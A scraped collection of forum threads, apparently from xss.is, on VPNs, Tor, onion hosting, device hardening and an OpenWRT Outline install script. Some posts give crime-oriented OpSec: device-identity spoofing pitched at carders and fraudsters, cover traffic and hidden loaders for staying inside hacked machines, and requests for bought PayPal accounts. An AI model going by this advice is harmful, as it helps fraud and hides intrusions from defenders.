Похоже, точно так же, как отпечаток пальца, у всех нас есть уникальный печатный отпечаток (отпечатки пальцев не уникальны на 100%), у всех нас есть уникальный способ структурирования предложений, синтаксис, грамматика, формулировки, правописание и так далее. Похоже, что это программное обеспечение отслеживает, кто связан с каждым печатным шрифтом, поэтому, если у конкретного человека идентифицирована его/ее настоящая личность, то этого человека навсегда можно будет отслеживать в Интернете, поскольку они (люди, владеющие программным обеспечением) могут просто запускать блоки письменного текста через программное обеспечение, чтобы увидеть, есть ли предыдущее известное совпадение, и если есть, то потенциальный визит, если то, что они говорят, "нежелательно", если совпадения нет, то текст, скорее всего, будет добавлен в базу данных для будущей идентификации.

Скрипта по развертыванию VPN сервера.

ID: 676533bbb4103b69df371b04
Thread ID: 68442
Created: 2022-06-10T11:35:30+0000
Last Post: 2022-06-10T13:02:41+0000
Author: parserov
Replies: 4 Views: 217

Всем добра. Подскажите скрипт по развертыванию своего VPN сервера для Linux . Уже настроенный из коробки. Которому можно доверять , чтоб логи не велись и т.д. Ну и может кто ещё подскажет бесплатный хостинг для размещения скрипта для теста. Спасибо.

Secure Android Device

ID: 676533bbb4103b69df371b07
Thread ID: 68377
Created: 2022-06-09T00:12:24+0000
Last Post: 2022-06-09T00:12:24+0000
Author: Nyrid
Replies: 0 Views: 216

Everything what you read is my experience and opinios i can make mistakes when yes let me know in comments
its writen by myself on English forums on xss i was copy/paste

Android device without any modification is pretty dangerous and I know a lot people want use android device than secure Linux because they don't have knowledge or time
so I bring to /d/OpSec two unique ways to have at night sweet dreams without any paranoid

before we start I need explain few worlds and thinks
- stock rom - pre-installed rom ( this rom include many app which people don't have in phone )
- custom rom - which build and developed community for each model of phone
- root - administrator access

first way is more simple you need just flash to your system TWRP and download some custom rom ( without gapps and AOSP rom )
its means this custom rom must be open-source and don't have pre-installed ( google service,google play,google chrome,gmail and etc )

because biggest hidden dangerous is Google and everything what he knows about each device so for this reason use AOSP CUSTOM ROM WITHOUT GAPPS
after that root device ( for example with magisk again over TWRP )

I recommend few popular tools for OpSec/Security
AFWALL - with this tool you can control which app have access to internet ( most important tool )
XPRIVACY-LUA - you can control permissions or even fake data to run every application
MAGISK MODULES - to change IMEI,SERIAL NUMBER, MODEL or even change fingerprint

this 3 applications help me a lot and for example on pixelscan.net I have everything green meanwhile i spoofing model and brand of device
its means for example I use Huawei P9 but with magisk modules I can change that for Redmi 9A PRO ( or even what you want )

Aurora Store - alternative to Google play store
F-Droid - store with foss gapps

there is thousands modules like app isolation,dns crypt and etc
also I recommend more use Zygisk than Riru which can be more easily detected

WARNING : YOU MUST UNDERSTAND TO SECURITY EXPLOITS YOUR DEVICE IS NOT ENCRYPTED AND OVER TWRP ITS POSSIBLE GET ACCESS TO ALL FILES ( I WAS SOLVED THAT WITH BRICKING RECOVERY MENU BUT DO THAT AFTER YOUR SETUP/SETTING IS DONE )

when we talk now seriously and you installed AOSP CUSTOM ROM WITHOUT GAPPS PROPERLY ROOT DEVICE AND INSTALLED IMPORTANT MODULES
i think in right hands this setup can be perfect for carders,frauders and etc

for more advanced users I recommend install Kali-Nethunter to have Linux with Chroot in pocket

-----------------------------------------------------------------------------------------

second way is more difficult and depends on your device ( brand,model ) but again flash system with TWRP
because we install real linux distribution to your mobile ( its means you don't have android but real linux alpine linux )

how its possible and how do that ?
its possible because strong community of developers make OS like postmarketOS,sailfishOS and etc

you must understand its real linux ( alpine-linux ) so its easy to install some tools and etc and its better when you have some experience in this field
but its guarantee you encrypt storage,nothing what can spy you or even etc

now you can hackers have your PC in your pocket

WARNING : FOR MY OPINION ITS NOT EXACTLY FOR CARDERS,FRAUDERS AND ETC BECAUSE ITS HARD TO CONFIGURE WHAT FLAGGED YOU
FOR EXAMPLE ON PIXELSCAN.NET I HAVE STILL PROBLEMS TO MANAGE HOW MAKE EVERYTHING GREEN

-----------------------------------------------------------------------------------------

Okay this is end of my article which I manually test ( 2 weeks ago ) so everything what you read its my experience because i am not best cyber- security expert its possible to make mistakes so when you find something what is not correct let me know

Thanks everyone for reading I be appreciate some feedback because i was spend a lot hours in this project ( testing and etc )

EDIT : I WAS FORGET TOLD YOU NEED UNLOCK BOOTLOADER TO FLASH TWRP

PLEASE DON'T PROVIDE THIS INFORMATIONS LIKE YOUR OWN GATHERED BUT ALWAYS ADD LINK OF THIS POST /post/f7c26966fa8f9ff236d7/
WHEN I SEE FEEDBACK I HAVE PREPARE SOME OTHER PROJECT WHICH I WANT SHARE

ALSO I OFFER FOR FREE "1ST WAY VIDEO TUTORIAL"
( SCREEN RECORD HOW FLASH TWRP,INSTALL ROM,ROOT DEVICE AND CONFIGURE EVERYTHING )

BUT ONLY WHEN I SEE A LOT INTERESTING PEOPLE BECAUSE RECORD AND PREPARE VIDEO TUTORIALS TAKES A LONG TIME

Настраиваем клиент Outline на OpenWRT за 5 минут с помощью tun2socks

ID: 676533bbb4103b69df371a0f
Thread ID: 97594
Created: 2023-09-08T10:57:36+0000
Last Post: 2023-09-08T10:57:36+0000
Author: baykal
Prefix: Статья
Replies: 0 Views: 216

Собственно сразу к делу, понадобится любая версия OpenWRT (проверялось на 19.07, 21.02, 22.03 и 23.05-rc1) и установленные пакеты kmod-tun и ip-full, а так же настроенный сервер Outline (shadowsocks). Рекомендую роутер не меньше чем с 128 Мб ОЗУ, будут показаны варианты установки в ПЗУ и ОЗУ.

Использоваться будет пакет xjasonlyu/tun2socks.

Установка

Скачаем скрипт в ОЗУ и дадим права на запуск:

Bash:Copy to clipboard

cd /tmp wget https://raw.githubusercontent.com/1andrevich/outline-install-wrt/main/install_outline.sh -O install_outline.sh chmod +x install_outline.sh

Проверьте что у вас установлены kmod-tun and ip-full , если нет, запустите:

Bash:Copy to clipboard

opkg update opkg install kmod-tun ip-full

Далее запускаем скрипт: (вам понадобится около 9 Мб свободной памяти роутера)

Bash:Copy to clipboard

./install_outline.sh

Скрипт запросит:

IP адрес вашего Сервера Outline (shadowsocks)

Outline (Shadowsocks) конфиг в формате "ss://base64coded@IP:ПОРТ" (копируем и вставляем из Outline Manager)

Хотите ли вы использовать Outline (shadowsocks) как шлюз по умолчанию (y/n)

Что делает скрипт:

Проверит наличие пакетов kmod-tun, ip-full

Cкачает tun2socks для вашего роутера (если пакет есть в репозитории)

Перенесёт файл в ПЗУ

Создаст необходимые записи в /etc/config/network и /etc/config/firewall

Перезагрузит сеть

Попросит ввести данные для настройки

Проверит и сохранит текущий маршрут по умолчанию

Создаст скрипт запуска /etc/init.d/tun2socks и добавит его в автозапуск

Установка в ОЗУ

Если у вас доступно меньше 9 Мб в ПЗУ , но есть желание установить клиент (и свободно минимум 35Мб ОЗУ), тогда:

Проверьте что установлены пакеты kmod-tun и ip-full

Запустите команды:

Bash:Copy to clipboard

cd /tmp wget https://raw.githubusercontent.com/1andrevich/outline-install-wrt/main/install_outline_ram.sh -O install_outline_ram.sh chmod +x install_outline_ram.sh ./install_outline_ram.sh

Что делает скрипт:

Проверит наличие пакетов kmod-tun, ip-full

Cкачает tun2socks для вашего роутера (если пакет есть в репозитории)

Создаст необходимые записи в /etc/config/network и /etc/config/firewall

Перезагрузит сеть

Попросит ввести данные для настройки

Проверит и сохранит текущий маршрут по умолчанию

Создаст скрипт запуска /etc/init.d/tun2socks и добавит его в автозапуск (и будет скачивать пакет tun2socks после каждой перезагрузки устройства)

На этом инструкция закончена.

Далее часть посвящена разбору скрипта и возможному устранению проблем.

Разбор скрипта

Для возможного устранения проблем

install_outline.sh по частям:

Bash:Copy to clipboard

# Step 1: Проверяет наличие kmod-tun, скрипт прекращается если не установлен opkg list-installed | grep kmod-tun > /dev/null if [ $? -ne 0 ]; then echo "kmod-tun is not installed. Exiting." exit 1 echo 'kmod-tun installed' fi

Тоже самое Step 2, для ip-full

Bash:Copy to clipboard

# Step 3: Проверяет наличие tun2socks если нет, то качает tun2socks с GitHub if [ ! -f "/tmp/tun2socks*" ]; then ARCH=$(grep "OPENWRT_ARCH" /etc/os-release | awk -F '"' '{print $2}') #Определяет архитектуру устройства wget https://github.com/1andrevich/outline-install-wrt/releases/download/v2.5.1/tun2socks-linux-$ARCH -O /tmp/tun2socks #Качает нужный файл # Check wget's exit status if [ $? -ne 0 ]; then echo "Download failed. No file for your Router's architecture" #Это значит что загрузка не удалась и выполнение скрипта будет прекращено exit 1 fi fi

Bash:Copy to clipboard

# Step 4: Проверка наличия tun2socks и перенос его в /usr/bin if [ ! -f "/usr/bin/tun2socks" ]; then mv /tmp/tun2socks /usr/bin/ echo 'moving tun2socks to /usr/bin' chmod +x /usr/bin/tun2socks fi

Bash:Copy to clipboard

# Step 5: Проверка наличия конфигурации в /etc/config/network если нет, тогда добавить if ! grep -q "config interface 'tunnel'" /etc/config/network; then echo " config interface 'tunnel' option device 'tun1' option proto 'static' option ipaddr '172.16.10.1' #Адрес роутера option netmask '255.255.255.252' #Подсеть из 4 адресов " >> /etc/config/network echo 'added entry into /etc/config/network' fi echo 'found entry into /etc/config/network'

Bash:Copy to clipboard

# Step 6:Проверка наличия конфигурации в /etc/config/firewall если нет, тогда добавить if ! grep -q "option name 'proxy'" /etc/config/firewall; then echo " config zone option name 'proxy' list network 'tunnel' option forward 'REJECT' option output 'ACCEPT' option input 'REJECT' option masq '1' option mtu_fix '1' option device 'tun1' option family 'ipv4' config forwarding option name 'lan-proxy' option dest 'proxy' option src 'lan' option family 'ipv4' " >> /etc/config/firewall echo 'added entry into /etc/config/firewall' fi

Step 7 перезапуск сети /etc/init.d/network restart

Bash:Copy to clipboard

# Step 8: Read user variable for OUTLINE HOST IP read -p "Enter Outline Server IP: " OUTLINEIP #Cохранение IP адреса в переменную # Read user variable for Outline config read -p "Enter Outline (Shadowsocks) Config (format ss://base64coded@HOST:PORT/?outline=1): " OUTLINECONF #Сохранение конфигурации в переменную

Step 9, 10 сохранение маршрута и интерфейса по умолчанию в переменные

Bash:Copy to clipboard

# Step 11: Создание скрипта /etc/init.d/tun2socks if [ ! -f "/etc/init.d/tun2socks" ]; then #Проверка наличия файла cat <<EOL > /etc/init.d/tun2socks #!/bin/sh /etc/rc.common USE_PROCD=1 # starts after network starts START=99 # stops before networking stops STOP=89 #PROG=/usr/bin/tun2socks #IF="tun1" #Интерфейс tun1 для избежания конфликтов с OpenVPN #OUTLINE_CONFIG="$OUTLINECONF" #LOGLEVEL="warning" #Уровень логгирования, только предупреждения и ошибки #BUFFER="64kb" #Размер буфера выбран исходя из вики tun2socks start_service() { procd_open_instance procd_set_param user root procd_set_param command /usr/bin/tun2socks -device tun1 -tcp-rcvbuf 64kb -tcp-sndbuf 64kb -proxy "$OUTLINECONF" -loglevel "warning" procd_set_param stdout 1 procd_set_param stderr 1 procd_set_param respawn "${respawn_threshold:-3600}" "${respawn_timeout:-5}" "${respawn_retry:-5}" procd_close_instance ip route add "$OUTLINEIP" via "$DEFGW" #Добавляет маршрут до сервера Outline echo 'route to Outline Server added' ip route save default > /tmp/defroute.save #Сохраняет действующий маршрут по умолчанию echo "tun2socks is working!" } boot() { # This gets run at boot-time. start } shutdown() { # This gets run at shutdown/reboot. stop } stop_service() { service_stop /usr/bin/tun2socks ip route restore default < /tmp/defroute.save #Восстанавливает действующий маршрут по умолчанию ip route del "$OUTLINEIP" via "$DEFGW" #Удаляет маршрут до сервера Outline echo "tun2socks has stopped!" } reload_service() { stop sleep 3s echo "tun2socks restarted!" start } EOL DEFAULT_GATEWAY="" #Спрашивает пользователя о назначении Outline маршрутом по умолчанию while [ "$DEFAULT_GATEWAY" != "y" ] && [ "$DEFAULT_GATEWAY" != "n" ]; do echo "Use Outline as default gateway? [y/n]: " read DEFAULT_GATEWAY done if [ "$DEFAULT_GATEWAY" = "y" ]; then cat <<EOL >> /etc/init.d/tun2socks #Заменяет текущий маршрут по умолчанию на Outline service_started() { # This function checks if the default gateway is Outline, if no changes it echo 'Replacing default gateway for Outline...' sleep 2s if ip link show tun1 | grep -q "UP" ; then ip route del default #Удаляет существующий маршрут по умолчанию ip route add default via 172.16.10.2 dev tun1 #Создает маршрут по умолчанию через прокси fi } start() { start_service service_started } EOL #Проверяет содержимое файла rc.local и добавляем при необходимости в rc.local скрипт для проверки маршрута по умолчанию при запуске if ! grep -q "sleep 20" /etc/rc.local; then sed '/exit 0/i\ sleep 20\ #Проверяет является ли Outline маршрутом по умолчанию или нет\ if ! ip route | grep -q '\''^default via 172.16.10.2 dev tun1'\''; then\ /etc/init.d/tun2socks start\ fi\ ' /etc/rc.local > /tmp/rc.local.tmp && mv /tmp/rc.local.tmp /etc/rc.local echo "All traffic would be routed through Outline" fi else #При выборе нет на вопрос маршрута, запускается этот вариант скрипта cat <<EOL >> /etc/init.d/tun2socks start() { start_service } EOL echo "No changes to default gateway" #Никаких изменений в маршрут по умолчанию fi echo 'script /etc/init.d/tun2socks created' chmod +x /etc/init.d/tun2socks fi

Bash:Copy to clipboard

# Step 12: Создание автозапуска if [ ! -f "/etc/rc.d/S99tun2socks" ]; then ln -s /etc/init.d/tun2socks /etc/rc.d/S99tun2socks echo '/etc/init.d/tun2socks /etc/rc.d/S99tun2socks создаётся симлинк указывающий на очередность загрузки' fi # Step 13: Start service /etc/init.d/tun2socks start echo 'Script finished' # Работа скрипта завершена

В случае install_outline_ram.sh в разделе на этапе создания скрипта /etc/init.d/tun2socks есть дополнительная запись в конфигурации:

Bash:Copy to clipboard

before_start() { #Перед запуском if [ ! -f "/tmp/tun2socks*" ]; then #Проверка наличия файла tun2socks в ОЗУ ARCH=$(grep "OPENWRT_ARCH" /etc/os-release | awk -F '"' '{print $2}') wget https://github.com/1andrevich/outline-install-wrt/releases/download/v2.5.1/tun2socks-linux-$ARCH -O /tmp/tun2socks #Скачивание файла # Check wget's exit status if [ $? -ne 0 ]; then echo "Download failed. No file for your Router's architecture" exit 1 fi fi . . . start_service() { before_start #Проверка наличия файла перед запуском основного скрипта

Автор Андрей @Andrevich
Источник habr.com

Binary Ninja не хочет вставать плагин, помогите

ID: 676533bbb4103b69df371a6e
Thread ID: 85949
Created: 2023-04-15T08:01:30+0000
Last Post: 2023-04-18T17:25:42+0000
Author: вавилонец
Replies: 2 Views: 214

День добрый! Качнул крякнутого нинзю, через pip поставил всё что требовалось, в $PATH добавил путь, 2 из 3 биб подхватил, один никак не видит. Что еще можно предпринять. Использую виртуалку ubuntu. К win особая неприязнь, не предлагайте там запускать пож. Заранее благодарю

Instagram баг или фича?

ID: 676533bbb4103b69df371baa
Thread ID: 56426
Created: 2021-09-08T14:58:10+0000
Last Post: 2021-09-08T14:59:52+0000
Author: AMG_1337
Replies: 1 Views: 214

Недавно задался вопросом, почему при востановлении к примеру аккаунта @navalny пишет пользователь не найден? Есть еще пару аналогичных аккаунтов с такой же проблемой, к тому же они активные, каким образом можно включить данную функцию? В Настройках нигде такого не нашел.

Как подружить Wireguard и Shadowsocks?

ID: 676533bbb4103b69df3719f9
Thread ID: 100540
Created: 2023-10-20T19:49:30+0000
Last Post: 2023-10-20T19:49:30+0000
Author: Focus17
Replies: 0 Views: 213

Скорее запрос на статью. Как подружить у себя на тачке, имея конфиг паблик впн сервиса и все, никаких сторонних впс с Cloak и тп. Софт + Софт = Серфинг
Хотелось бы увидеть реализацию на винде и на никсах.

Анонимный ИТ проект (обсуждение)

ID: 676533bbb4103b69df3719f4
Thread ID: 100820
Created: 2023-10-24T14:12:04+0000
Last Post: 2023-10-24T14:12:04+0000
Author: GXTrust
Replies: 0 Views: 213

Всех Приветствую!

Хочу поднять на обсуждение очень важную тему. В первую очередь для владельцев Анонимных ИТ продуктов.

Кто как ведет свои компании? Какие инструменты используете для безопастной работы, самого продукта и сотрудников.

Системы управления доступами/привелегий, защиты от утечек кода, постановка задач, контроль выполнения, найм/контроль сотрудников, коммуникация и т.д

Основной посыл - обсудить тему запуска своего анонимного ИТ продукта аля даркфорумы/даркмаркеты/ серые/черные ит продукты для команд от 10 до 100 сотрудников.

TOR Map

ID: 676533bbb4103b69df371b02
Thread ID: 68711
Created: 2022-06-15T11:24:46+0000
Last Post: 2022-06-15T17:59:50+0000
Author: tuyvor
Replies: 2 Views: 212

World City Map of Tor Nodes

Can anyone suggest better VPS and proxychain methods

ID: 676533bbb4103b69df371bae
Thread ID: 56223
Created: 2021-09-03T02:33:02+0000
Last Post: 2021-09-03T02:52:56+0000
Author: yonex
Replies: 1 Views: 210

hi there

I want to know few things could you help me out

Critical Mullvad VPN Vulnerabilities Let Attackers Execute Malicious Code

ID: 676533bbb4103b69df3718ea
Thread ID: 129040
Created: 2024-12-16T09:18:00+0000
Last Post: 2024-12-16T10:02:13+0000
Author: r_as
Replies: 1 Views: 209

CVE-2024-55884 (CVSS 9.0): Critical Vulnerability Found in Mullvad VPN

X41 D-Sec GmbH, a leading cybersecurity firm, has completed a white-box penetration test of the Mullvad VPN application, revealing several vulnerabilities, including one rated as “critical” and two rated as “high” severity.

The audit uncovered three high-severity vulnerabilities, including issues with signal handlers and sideloading risks during installation processes. One notable vulnerability, MLLVD-CR-24-01 (CVE-2024-55884, CVSS 9.0), involves insufficient alternate stack sizes for signal handlers, potentially leading to memory corruption. As the report explains, “While exploitation for code execution is expected to be non-trivial, the fact that the alt stack collides with the heap of concurrently running processes makes exploitation a possibility if an attacker is able to trigger a signal in the right context.”

Despite these findings, X41 D-Sec GmbH acknowledged the high-security level of the Mullvad VPN application, stating that “Overall, the Mullvad VPN Application appear to have a high-security level and are well positioned to protect from the threat model proposed in this report.” The report also highlighted Mullvad’s commitment to security, noting their “use of safe coding and design patterns in combination with regular audits and penetration tests” which has “led to a very hardened environment.”

Mullvad VPN AB has responded swiftly to the findings, addressing the vulnerabilities and undergoing a fix audit to ensure effectiveness. X41 D-Sec GmbH recommends continued regular security reviews and mitigation of the identified issues, stating that doing so “will strengthen the security of the system and is recommended for defense in depth.”

source: <https://securityonline.info/cve-2024-55884-cvss-9-0-critical- vulnerability-found-in-mullvad-vpn/>

Free hosting tor

ID: 676533bbb4103b69df3719bc
Thread ID: 106792
Created: 2024-01-27T10:37:21+0000
Last Post: 2024-01-27T10:45:25+0000
Author: blackhunt
Replies: 2 Views: 209

Free hosting tor
with an initial space of 5 gig

link : http://krikebqu3etblhbh7hx4ac675wdsu2sv3cvpvw7wodsoeqfae3hw3yqd.onion/

Cover traffic and covering tracks inside system

ID: 676533bbb4103b69df3719f6
Thread ID: 100622
Created: 2023-10-21T23:38:59+0000
Last Post: 2023-10-21T23:38:59+0000
Author: xuitao
Replies: 0 Views: 209

For some reason there is no dedicated discussion about this in my understanding extremely important, but ignored subject. I did some searches online, but couldn't find anything useful. Anyone wants to share some ideas? Let me begin.

Cover traffic or dummy traffic how it is sometimes called is a type of network traffic which is meaningless for somebody "at work", the sole purpose of such traffic is to make, as hard as it is possible to mask what is actually going on with traffic going in and out from the machine. Without cover traffic, an external observers, depending on their skills can recognize and separate traffic. If they are following the chain, they could say is machine originator, relay or terminator of the traffic. Especially if they get access to the machine.

At the moment I think that cover traffic is a bespoke thing, meaning that there is no one works for everything scenario, but there could be some templates. Also, cover traffic is a thing which must be adapted to the plan, not the other way around. For example, cover traffic should be different in the scenario where purpose of the machine is to send and receive as much traffic as possible compared to the machine which relays audio/video traffic. In first scenario random connections, downloading large files from many different websites could be an option and for audio/video - something like bittorrent could be an option, obviously controlling quality of service to make sure this traffic wont affect audio/video/latency.
If I was tasked to understand what is going with hacked machine, I would also find things very hard to understand if machine would behave in one way one hour, but completely different in other one and so on.

When it comes to hiding things inside box, I think setting up everything in tmp/ramfs is a one of the first things to do. If machine gets rebooted or if connection is lost, it is debatable if it is worth connecting back and restoring things manually. Maybe it is worth abandoning such machine if stakes are high? Or maybe it is worth adding some hidden loaders inside system, where when machines comes back online - some hidden scripts/binaries will restore everything automatically?

Concept from Live Host + Live VM

ID: 676533bbb4103b69df371a38
Thread ID: 93113
Created: 2023-07-16T16:25:11+0000
Last Post: 2023-07-19T12:37:24+0000
Author: A-17
Replies: 2 Views: 208

I've been using a similar configuration for a few days now and everything is working fine, that's why I'm sharing it here.

Install Kicksecure from Debian bullseye (minimalist installation)

Prerequisites
- Debian bullseye installed.
- User account user exists.

Bash:Copy to clipboard

$ su # apt update # apt full-upgrade # apt install --no-install-recommends sudo adduser # /usr/sbin/addgroup --system console # /usr/sbin/adduser user console # /usr/sbin/adduser user sudo # /sbin/reboot $ sudo apt install --no-install-recommends curl $ sudo curl --tlsv1.3 --output /usr/share/keyrings/derivative.asc --url https://www.kicksecure.com/keys/derivative.asc $ sudo apt install apt-transport-tor $ echo "deb [signed-by=/usr/share/keyrings/derivative.asc] tor+http://deb.w5j6stm77zs6652pgsij4awcjeel3eco7kvipheu6mtr623eyyehj4yd.onion bullseye main contrib non-free" | sudo tee /etc/apt/sources.list.d/derivative.list $ sudo apt install --no-install-recommends kicksecure-xfce-host --onion $ whonix-installer-cli --onion $ whonix-installer-xfce --onion # /sbin/reboot

upgrade-nonroot and take snapshot of each VM.

From this point on, there are too many needs and possibilities to cover everyone's threat models, so I'll keep things as simple as possible.

The rest is up to you.

Installed missed software in any cloned Whonix-Workstation VM, check/correct configurations and snapshot it.
- PET app > Briar (or Cwtch, Onionshare)
- IM > Signal
- GPG > GPGFrontend
- File Sharing > magic-wormhole (or Onionshare)

Reboot Host.

From now, you can boot from Live mode USER on Host and Guest VM. So we combine the benefits of Whonix with those of Tails, without compromise.

It is recommended to use Live mode as a standard for sensitive data use cases. Live mode is also a useful tool for better privacy on the hard drive, but it is also recommended regularly boot into persistent mode (for example once per day) for installation of updates.

Tor2we, tor proxies. обсуждение сервисов (Onion.ly)

ID: 676533bbb4103b69df3719b5
Thread ID: 107160
Created: 2024-01-31T19:39:57+0000
Last Post: 2024-01-31T20:34:05+0000
Author: voldemort
Replies: 2 Views: 208

У onion.li ужасное HTTP-производительность. Есть ли какая-то быстрая альтернатива?

Новосибирск!

ID: 676533bbb4103b69df371b45
Thread ID: 62897
Created: 2022-02-13T11:41:35+0000
Last Post: 2022-02-13T11:41:35+0000
Author: Pedagog12
Replies: 0 Views: 207

Торрент и TOR

ID: 676533bbb4103b69df3719cd
Thread ID: 105344
Created: 2024-01-08T16:48:57+0000
Last Post: 2024-01-08T18:47:50+0000
Author: Android_2025
Replies: 1 Views: 207

Приветсвую, т. к. я особо в этой теме не разбираюсь, и после гуглежки нечего путного не нашел, хотел бы спросить у знающих людей:

Возможно ли анонимно использовать торрент через TOR, видел информацию, что это не анонимно и делать ни в коем случае нельзя.

Если все таки есть смысл, то как это правильно сделать (может у кого - то есть мануал или кто - то поделится своим опытом).

Можно ли становиться на раздачу, если ты сидишь из - под TOR'а.
Заранее благодарю!

Chrome+.onion

ID: 676533bbb4103b69df371acb
Thread ID: 72216
Created: 2022-08-25T06:59:12+0000
Last Post: 2022-08-25T17:20:36+0000
Author: JuniorHacker
Replies: 5 Views: 205

Система вин7. На одном ноуте при пробросе винды через хуникс .onion в хроме открывались спокойно. На другом ноуте не открываются, хотя вроде как делал все тоже самое. В чем может быть загвоздка?

NATO - Cyber Defence Awareness Course [2019]

ID: 676533bbb4103b69df3719be
Thread ID: 106643
Created: 2024-01-25T10:38:38+0000
Last Post: 2024-01-25T21:46:35+0000
Author: monumentum
Prefix: Мануал/Книга
Replies: 1 Views: 205

Курс состоит из 17 уроков

Spoiler: Описание курса

Cyber Defence Awareness Course

The Cyber Defence Awareness e-Learning course aims to enhance the general user’s awareness of cyber security risks and measures to mitigate those risks.
With the completion of this course you can earn 4 ISACA CPEs.
The course is open to all individuals from CCDCOE member nations and NATO.

Learning Objectives

This course provides an introduction to cyber security in general, providing attack methods, terminology and defensive techniques. It gives an overview of the recent threat landscape.
Target Audience
The Cyber Defence Awareness e-course was developed with the goal of raising the awareness of the average user within the NATO community, covering the most relevant topics in the area. The training audience includes all users of NATO networks.

Outline

• General cyber security terminology and categorisation.
• Malware, viruses and spyware.
• Anti-virus software.
• Unauthorised system access and characteristics of a strong password.
• Identity theft and compromise of classified data.
• Risks regarding removable media.
• Risks associated with emails (dangerous attachments, hoaxes, etc.).
• Threats to and from mobile devices.
• Backing up systems and files.
• File sharing and copyright issues.
• The dangers of unsecured wireless networks.
• Desktop security.
• Social engineering and other human aspects.
• Disposal of information.
• The risks of social networking.

Prerequisites

Basic computer user skills.

Скачать:

![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)

[ 125.18 MB file on MEGA

](https://mega.nz/file/BmExXLqI#dh3hMIaxJ3g4ycx9kqnzIFE7qaByhc5Jgeu1ZY9yuzM)

mega.nz

How to get a custom domain name for Tor hidden service - Onion 3

ID: 676533bbb4103b69df371abf
Thread ID: 72899
Created: 2022-09-08T16:59:16+0000
Last Post: 2022-09-08T16:59:16+0000
Author: sommerdev
Replies: 0 Views: 204

Hey guys this is my first tutorial in xss.is I hope you like it

you want to get a custom domain name for your onion site but as you know these sites are generated automatically by tor and this is sad, in this tutorial i will explain to you how to get a custom domain name for your onion site.

First i will mention something important:
I am going to assum your have installed tor,apache2 and git and golang on you system.
DO NOT USE WINDOWS OR MAC FOR THIS TUTORIAL.
I am using ubuntu in this tutorial.

first you have to download oniongen-go from github:

![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F03d181d026adadb809cd0d1294b6bc91bb081db2dfba0db749f93e2a395dcf65%2Frdkr%2Foniongen- go&hash=03c7d17abf412e08c518474f739eb88a&return_error=1)

[ GitHub - rdkr/oniongen-go: 🔑 v3 .onion vanity URL generator written in

Go ](https://github.com/rdkr/oniongen-go)

🔑 v3 .onion vanity URL generator written in Go. Contribute to rdkr/oniongen-go development by creating an account on GitHub.

github.com

Change to base directory of oniongen-go source and build oniongen-go

cd oniongen-go
go build main.go

Generate 1 addresses with ‘hack’ as a keyword in any position of the address

./main "hack" 1

**Use ‘^’ to indicate the beginning or end of the address as desired keyword position

To generate 2 address with keyword at the start of address:**

./main "^hack" 1

but if you want to generate 1 address with keyword at the end of address:

./main "hack^" 1

as you can see this is the folder generated by oniongen-go:

if we open this folder called hackrqypzf5vhra7s7v6wmd4dvalpsyem528lnm3g76egb4p7yd you will see these files generated:

if we open the file called hostname you will see this:

now we have to move these files to /var/lib/tor/:

sudo mv /Desktop/oniongen- go/hackrqypzf5vhra7s7v6mo6wnzwd4dvalp5yew526lnm3g76egb4p7yd /var/lib/tor/hacksite:

Set the correct owner and permissions:

sudo chown -R debian-tor: /var/lib/tor/hacksite
sudo chmod -R u+rwX,og-rwx /var/lib/tor/hacksite

Include these keys in the /etc/tor/torrc file:

We restart the service and check its status:

sudo systemctl restart tor
systemctl status tor

now we just have to open the folder hacksite and cat the file called hostname :

now we just have to open our browser and we will see our site.

that is all.

Double&Single VPN на 2х VPS?

ID: 676533bbb4103b69df371aab
Thread ID: 73964
Created: 2022-10-05T04:35:10+0000
Last Post: 2022-10-09T19:06:59+0000
Author: JuniorHacker
Replies: 1 Views: 203

Возник такой вопрос. Есть необходимость в VPN. Для этого планируется купить 2 VPS, и поднять это дело. Но, вопрос именно в том, что 2 VPS.
VPS1 - условно USA
VPS2 - условно FR

Переодически мне надо иметь даблвпн и выход в FR, а иногда для задач надо именно выход из USA.
Могу ли я сделать 2 конфига, первый на VPS1 - конфиг SingleVPN и выход USA, и на этом же VPS сделать входную точку для DoubleVPN, пробросив ее на VPS2, чтобы на выходе была FR? Именно в рамках одного VPS.
И если да, то какой конфиг посоветуете?

Alternative for Linux like LinkenSphere

ID: 676533bbb4103b69df371b31
Thread ID: 62886
Created: 2022-02-13T09:26:53+0000
Last Post: 2022-03-18T20:16:39+0000
Author: Azuret-Calyx
Replies: 2 Views: 203

Hello everyone again,

do You know something better than firefox on linux ? I tried unGoogled chronium and be honest default firefox seems better

XSS.is XMPP service + OTR?

ID: 676533bbb4103b69df371ab9
Thread ID: 73313
Created: 2022-09-17T11:42:43+0000
Last Post: 2022-09-17T13:12:05+0000
Author: X-Particle
Replies: 3 Views: 201

Does this site offers an XMPP service?
I was using xmpp.jp but i heard they cooperate with the police

---------------------------------------------------------------------------------------
Предлагает ли этот сайт службу обмена сообщениями XMPP?
Я использовал xmpp.jp но я слышал, что они сотрудничают с полицией

Смогу ли я пользоваться открытыми портами на дедике с основной машины?

ID: 676533bbb4103b69df371a9e
Thread ID: 73733
Created: 2022-09-28T18:45:10+0000
Last Post: 2022-11-03T15:27:00+0000
Author: Jake
Replies: 1 Views: 200

Хочу поднять WireGuard на дедике и там же открыть порты. Если я подключусь к ВПН с основной машины, он мне позволит использовать открытые порты?
Если способ х#йня, посоветуйте как лучше открыть порты и настроить цепь

Анонимность, безопасность платежей, PayPal, VCC, CC (Anonymous payments, VCC)

ID: 676533bbb4103b69df371a6b
Thread ID: 86568
Created: 2023-04-24T09:54:31+0000
Last Post: 2023-04-26T08:28:34+0000
Author: P3t3rspe4r
Replies: 1 Views: 200

Can anyone recommend about anonymous payment methods for platforms like:
fiverr
upwork
freelancer.com

some reliable VCC / paypal-accounts-for-sale service

thx!

Сайты которые определяют VPN, как фиксить?

ID: 676533bbb4103b69df371ae2
Thread ID: 71271
Created: 2022-08-07T12:57:46+0000
Last Post: 2022-08-07T13:31:28+0000
Author: carthief77
Replies: 1 Views: 199

Подскажите плиз. Допустим есть сайты которые определяют VPN, как обойти? Использую свою VPSку, подскажите конкретное решение, может DNS, или антидетекты, хз, использую Firefox Focus на андроиде, все равно палит, как фиксить?

Какие надеждые VPN сервисы предоставляют статический IP?

ID: 676533bbb4103b69df371aca
Thread ID: 72247
Created: 2022-08-25T17:43:20+0000
Last Post: 2022-08-25T18:12:30+0000
Author: Belyashik
Replies: 3 Views: 197

Нужен стабильный и надежный VPN сервис с возможностью получения статического IP (платный, но за разумные деньги).

